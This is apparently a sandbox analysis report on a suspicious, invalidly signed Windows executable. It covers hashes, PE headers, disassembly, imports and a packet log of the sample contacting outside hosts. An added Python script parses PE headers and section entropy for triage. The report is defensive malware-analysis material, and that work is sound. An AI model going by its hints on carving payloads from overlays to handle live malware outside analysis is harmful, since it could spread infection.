                                                                                                                                                                                                                                            SSDEEP:24:KJfNkFGkId3ka6KOkqeFkOfzEifOKax5DqBVKVrdFAMBJTH:uNk/kka6NkqeFkyzEuOK2DcVKdBJj
                                                                                                                                                                                                                                            MD5:351F2263AE3B5F13CABD4BA7B4DFAD6B
                                                                                                                                                                                                                                            SHA1:5DEDAB24D1FBD0620889FD42D701596EE0282263
                                                                                                                                                                                                                                            SHA-256:0D6D72691CA8A93E0818CE251A4937FD95E69EB2D73E4E277C3F6E1386C9247D
                                                                                                                                                                                                                                            SHA-512:2AA0C24BD7D0EA83CA1E08ADE84E1847FB2C551DB1BF159B5CCA94F5760ED0EE14084EE0FB3245157F0BD4B6BD41B464F446F1340C1A3FC4CA38516F6FAD0845
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longe
                                                                                                                                                                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):97
                                                                                                                                                                                                                                            Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                                            MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                                            SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                                            SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                                            SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
                                                                                                                                                                                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Entropy (8bit):7.993357815338302
                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                            File name:program.exe
                                                                                                                                                                                                                                            File size:7'954'796 bytes
                                                                                                                                                                                                                                            MD5:3e6865657b29faea3a355c710f0aad45
                                                                                                                                                                                                                                            SHA1:ad9b98fa0f96685abc17aaab7fe4d65ac8fe34f7
                                                                                                                                                                                                                                            SHA256:2c48f7bc874f1c812c0031519e756c28f940a58b2f64cdb40a08f1ccc798f671
                                                                                                                                                                                                                                            SHA512:b360b5a244e83ee95719d7e781b9a49a29a5251e936619786b0151d0992aee33746109b3a8b0ab8d18c2788b738892c9b296c8c601025e16d850d730837b1615
                                                                                                                                                                                                                                            SSDEEP:196608:7YHYUNwfI9jUCzi4H1qSiXLGVi7DMgpZ3Q0VMwICEc/jL:4CIHziK1piXLGVE4Ue0VJ3
                                                                                                                                                                                                                                            TLSH:3A863301BA8019F6F6FB9A3DC8928019C47236A217A0D6FB172CD2790D735FA5D36763
                                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..*\.Z*\.Z*\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z*\.Z.\.Zb..[3\.Zb..[+\.ZRich*\.Z........PE..d..
                                                                                                                                                                                                                                            Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                            Entrypoint:0x14000cdb0
                                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                            Time Stamp:0x671A1EED [Thu Oct 24 10:18:21 2024 UTC]
                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                            Import Hash:72c4e339b7af8ab1ed2eb3821c98713a
                                                                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                                                                            Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                                                                            • 29/09/2021 01:00:00 29/09/2024 00:59:59
                                                                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                                                                            • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                                                                                                                                                                                                            Version:3
                                                                                                                                                                                                                                            Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                                                                                                                                                                                                            Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                                                                                                                                                                                                            Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                                                                                                                                                                                                            Serial:00BFB15001BBF592D4962A7797EA736FA3
                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                                            call 00007F26ACB08E6Ch
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                                            jmp 00007F26ACB08A8Fh
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                                            call 00007F26ACB09238h
                                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                                            je 00007F26ACB08C33h
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            mov ecx, dword ptr [eax+08h]
jmp 00007F26ACB08C17h
dec eax
cmp ecx, eax
je 00007F26ACB08C26h
xor eax, eax
dec eax
cmpxchg dword ptr [0003577Ch], ecx
jne 00007F26ACB08C00h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F26ACB08C09h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007F26ACB08C19h
mov byte ptr [00035765h], 00000001h
call 00007F26ACB08365h
call 00007F26ACB09650h
test al, al
jne 00007F26ACB08C16h
xor al, al
jmp 00007F26ACB08C26h
call 00007F26ACB1616Fh
test al, al
jne 00007F26ACB08C1Bh
xor ecx, ecx
call 00007F26ACB09660h
jmp 00007F26ACB08BFCh
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [0003572Ch], 00000000h
mov ebx, ecx
jne 00007F26ACB08C79h
cmp ecx, 01h
jnbe 00007F26ACB08C7Ch
call 00007F26ACB091AEh
test eax, eax
je 00007F26ACB08C3Ah
test ebx, ebx
jne 00007F26ACB08C36h
dec eax
lea ecx, dword ptr [00035716h]
call 00007F26ACB15F62h

Note on the listing above: program.exe is a PE32+ (x64) image (it carries a .pdata section and an EXCEPTION directory and imports RtlVirtualUnwind), but the listing is decoded as 32-bit code, so the REX prefix bytes 0x48 and 0x40 appear as stand-alone "dec eax" and "inc eax". Read "dec eax / sub esp, 28h" as "sub rsp, 28h", "dec eax / add esp, 28h" as "add rsp, 28h", "inc eax / push ebx" as "push rbx", and "dec eax / lea ecx, dword ptr [...]" as a RIP-relative "lea rcx, [...]". The three-instruction sequence "sub rsp, 28h ... add rsp, 28h / ret" is the standard MSVC x64 prologue/epilogue for a leaf-calling function with home space, so the blocks separated by int3 padding are ordinary compiler-generated runtime-init code, not hand-written shellcode.
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3ca5c | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x47000 | 0x94c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x44000 | 0x2250 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x793d24 | 0x2448 | (raw file offset, not an RVA; lies past the end of every section)
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x48000 | 0x764 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3a080 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x39f40 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IAT | 0x2b000 | 0x4a0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 

The SECURITY entry is the only data directory whose first field is a file offset rather than an RVA, which is why the report leaves its section blank. The six sections below account for only 0x41000 bytes of raw data, so an Authenticode blob at file offset 0x793d24 sits in a multi-megabyte overlay appended after the PE image proper; that overlay, not the small loader in the sections, is where the bulk of this sample lives.
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x29f00 | 0x2a000 | 2a7ae207b6295492e9da088072661752 | False | 0.5514439174107143 | data | 6.487454925709845 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2b000 | 0x12a50 | 0x12c00 | 9c4484e90874011862810022cd067d0b | False | 0.5244791666666667 | data | 5.752673446570296 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x53f8 | 0xe00 | dba0caeecab624a0ccc0d577241601d1 | False | 0.134765625 | data | 1.8392217063172436 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x44000 | 0x2250 | 0x2400 | f5559f14427a02f0a5dbd0dd026cae54 | False | 0.470703125 | data | 5.291665041994019 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x47000 | 0x94c | 0xa00 | e7b5af0a11bf12adf33a686e43d0f46b | False | 0.425 | data | 5.109629462188209 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x48000 | 0x764 | 0x800 | 816c68eeb419ee2c08656c31c06a0fff | False | 0.5576171875 | data | 5.2809528666624175 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
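The two columns of these tables that do the most triage work, "Is in Section" and "Entropy", are cheap to recompute from the raw headers. The script below is an added example and is not part of the Joe Sandbox report or of program.exe: it walks the IMAGE_FILE_HEADER, optional header (PE32 or PE32+) and section table with the standard library only, computes per-section Shannon entropy over each section's raw bytes, resolves every data-directory RVA to its section, and treats IMAGE_DIRECTORY_ENTRY_SECURITY as the raw file offset it is, reporting "overlay" when it points past the last section's raw data (which is what the 0x793d24 value above indicates). The PE32+ image it runs against is constructed inline by build_test_image() so that the example works offline; its section names, sizes and directory values are made up for the test.

```python
# Added example (not from the Joe Sandbox report or from program.exe): rebuild the
# "Is in Section" and "Entropy" columns of the PE tables from raw headers, and
# resolve IMAGE_DIRECTORY_ENTRY_SECURITY as the file offset it really is.
# build_test_image() constructs a hypothetical PE32+ so the script runs offline.
import math
import struct

DIRECTORY_NAMES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
    "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
    "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniform (packed/encrypted)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(image: bytes):
    """Return (sections, directories) for a PE32 or PE32+ image held in memory."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    fh = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", image, fh + 2)[0]
    size_of_optional = struct.unpack_from("<H", image, fh + 16)[0]
    opt = fh + 20                                       # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", image, opt)[0]
    if magic == 0x20B:                                  # PE32+: directories at +112
        num_dirs_off, dir_off = opt + 108, opt + 112
    elif magic == 0x10B:                                # PE32: directories at +96
        num_dirs_off, dir_off = opt + 92, opt + 96
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    num_dirs = struct.unpack_from("<I", image, num_dirs_off)[0]
    directories = {}
    for i in range(min(num_dirs, 16)):
        value, size = struct.unpack_from("<II", image, dir_off + 8 * i)
        directories["IMAGE_DIRECTORY_ENTRY_" + DIRECTORY_NAMES[i]] = (value, size)
    sections = []
    sh = opt + size_of_optional                         # first IMAGE_SECTION_HEADER
    for i in range(num_sections):
        base = sh + 40 * i
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, base)
        chars = struct.unpack_from("<I", image, base + 36)[0]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "raw_ptr": raw_ptr, "raw_size": raw_size,
            "characteristics": chars,
            "entropy": shannon_entropy(image[raw_ptr:raw_ptr + raw_size]),
        })
    return sections, directories


def section_for_rva(sections, rva: int) -> str:
    """Name of the section whose virtual range holds rva, or '' if none does."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return s["name"]
    return ""


def classify_directories(sections, directories) -> dict:
    """Rebuild 'Is in Section'. SECURITY holds a raw file offset, not an RVA, so it
    is compared with the end of section raw data and flagged as an overlay."""
    end_of_sections = max(s["raw_ptr"] + s["raw_size"] for s in sections)
    result = {}
    for name, (value, size) in directories.items():
        if size == 0:
            result[name] = ""
        elif name == "IMAGE_DIRECTORY_ENTRY_SECURITY":
            result[name] = "overlay" if value >= end_of_sections else "file offset"
        else:
            result[name] = section_for_rva(sections, value)
    return result


def summarize(image: bytes) -> dict:
    sections, directories = parse_pe(image)
    return {"entropy": {s["name"]: round(s["entropy"], 4) for s in sections},
            "directories": classify_directories(sections, directories)}


def build_test_image() -> bytes:
    """Constructed PE32+ (hypothetical): .text holds every byte value twice (entropy
    8.0), .data is all zeros (0.0), IMPORT points into .data, SECURITY into an overlay."""
    text, data, overlay, headers_size = bytes(range(256)) * 2, b"\0" * 0x200, b"OVERLAY!" * 8, 0x200
    opt = bytearray(240)                                # IMAGE_OPTIONAL_HEADER64
    struct.pack_into("<H", opt, 0, 0x20B)
    struct.pack_into("<I", opt, 108, 16)                # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112 + 8 * 1, 0x2010, 0x40)                          # IMPORT
    struct.pack_into("<II", opt, 112 + 8 * 4, headers_size + 0x400, len(overlay))   # SECURITY
    file_header = struct.pack("<HHIIIHH", 0x8664, 2, 0, 0, 0, len(opt), 0x22)

    def sec(name, size, va, raw_ptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, size, va, size, raw_ptr, 0, 0, 0, 0, chars)

    sections = sec(b".text", len(text), 0x1000, 0x200, 0x60000020) + sec(b".data", len(data), 0x2000, 0x400, 0xC0000040)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)             # e_lfanew
    headers = (bytes(dos) + b"PE\0\0" + file_header + bytes(opt) + sections).ljust(headers_size, b"\0")
    return headers + text + data + overlay


if __name__ == "__main__":
    for key, value in summarize(build_test_image()).items():
        print(key, value)
```

Point summarize() at open("program.exe", "rb").read() to reproduce the report's numbers; a SECURITY result of "overlay" together with a small, mid-entropy .text is the usual shape of a bundler or loader stub whose real payload is carved out of the overlay at run time, and the overlay bytes (from the end of the last section to end of file) are what to carve and analyse next.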
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x470a0 | 0x39c | data | | | 0.44696969696969696
RT_MANIFEST | 0x4743c | 0x50d | XML 1.0 document, ASCII text | | | 0.4694508894044857
DLL | Import
USER32.dll | CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll | (no named imports listed)
KERNEL32.dll | GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll | OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll | SelectObject, DeleteObject, CreateFontIndirectW
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 17, 2024 11:22:40.995274067 CET | 49743 | 80 | 192.168.2.4 | 208.95.112.1
Nov 17, 2024 11:22:41.000155926 CET | 80 | 49743 | 208.95.112.1 | 192.168.2.4
Nov 17, 2024 11:22:41.000231028 CET | 49743 | 80 | 192.168.2.4 | 208.95.112.1
Nov 17, 2024 11:22:41.000364065 CET | 49743 | 80 | 192.168.2.4 | 208.95.112.1
Nov 17, 2024 11:22:41.005729914 CET | 80 | 49743 | 208.95.112.1 | 192.168.2.4
Nov 17, 2024 11:22:41.646361113 CET | 80 | 49743 | 208.95.112.1 | 192.168.2.4
Nov 17, 2024 11:22:41.688870907 CET | 49743 | 80 | 192.168.2.4 | 208.95.112.1
Nov 17, 2024 11:22:41.867341995 CET | 49744 | 443 | 192.168.2.4 | 162.159.137.232
Nov 17, 2024 11:22:41.867386103 CET | 443 | 49744 | 162.159.137.232 | 192.168.2.4
Nov 17, 2024 11:22:41.867495060 CET | 49744 | 443 | 192.168.2.4 | 162.159.137.232
Nov 17, 2024 11:22:41.895235062 CET | 49744 | 443 | 192.168.2.4 | 162.159.137.232
Nov 17, 2024 11:22:41.895255089 CET | 443 | 49744 | 162.159.137.232 | 192.168.2.4
Nov 17, 2024 11:22:42.515476942 CET | 443 | 49744 | 162.159.137.232 | 192.168.2.4
Nov 17, 2024 11:22:42.515989065 CET | 49744 | 443 | 192.168.2.4 | 162.159.137.232
Nov 17, 2024 11:22:42.516005993 CET | 443 | 49744 | 162.159.137.232 | 192.168.2.4
Nov 17, 2024 11:22:42.517113924 CET | 443 | 49744 | 162.159.137.232 | 192.168.2.4
Nov 17, 2024 11:22:42.517200947 CET | 49744 | 443 | 192.168.2.4 | 162.159.137.232
Nov 17, 2024 11:22:42.518805027 CET | 49744 | 443 | 192.168.2.4 | 162.159.137.232
Nov 17, 2024 11:22:42.518913984 CET | 443 | 49744 | 162.159.137.232 | 192.168.2.4
Nov 17, 2024 11:22:42.519176006 CET | 49744 | 443 | 192.168.2.4 | 162.159.137.232
Nov 17, 2024 11:22:42.519196987 CET | 443 | 49744 | 162.159.137.232 | 192.168.2.4
Nov 17, 2024 11:22:42.519246101 CET | 49744 | 443 | 192.168.2.4 | 162.159.137.232
Nov 17, 2024 11:22:42.519269943 CET | 443 | 49744 | 162.159.137.232 | 192.168.2.4
Nov 17, 2024 11:22:42.519427061 CET | 49744 | 443 | 192.168.2.4 | 162.159.137.232
Nov 17, 2024 11:22:42.519459009 CET | 443 | 49744 | 162.159.137.232 | 192.168.2.4
Nov 17, 2024 11:22:42.519645929 CET | 49744 | 443 | 192.168.2.4 | 162.159.137.232
Nov 17, 2024 11:22:42.519686937 CET | 443 | 49744 | 162.159.137.232 | 192.168.2.4
Nov 17, 2024 11:22:42.519769907 CET | 49744 | 443 | 192.168.2.4 | 162.159.137.232
Nov 17, 2024 11:22:42.519793987 CET | 443 | 49744 | 162.159.137.232 | 192.168.2.4
Nov 17, 2024 11:22:42.519813061 CET | 49744 | 443 | 192.168.2.4 | 162.159.137.232
Nov 17, 2024 11:22:42.519824028 CET | 443 | 49744 | 162.159.137.232 | 192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.519862890 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.519882917 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.519923925 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.519937038 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.519948006 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.519957066 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.519967079 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.519970894 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520019054 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520030975 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520076036 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520085096 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520116091 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520128965 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520158052 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520174980 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520250082 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520271063 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520287991 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520298004 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520308971 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520313978 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520318985 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520323038 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520370960 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520384073 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520416021 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520423889 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520433903 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520442963 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520452023 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520500898 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520509005 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520524979 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520564079 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520600080 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520632029 CET49744443192.168.2.4162.159.137.232
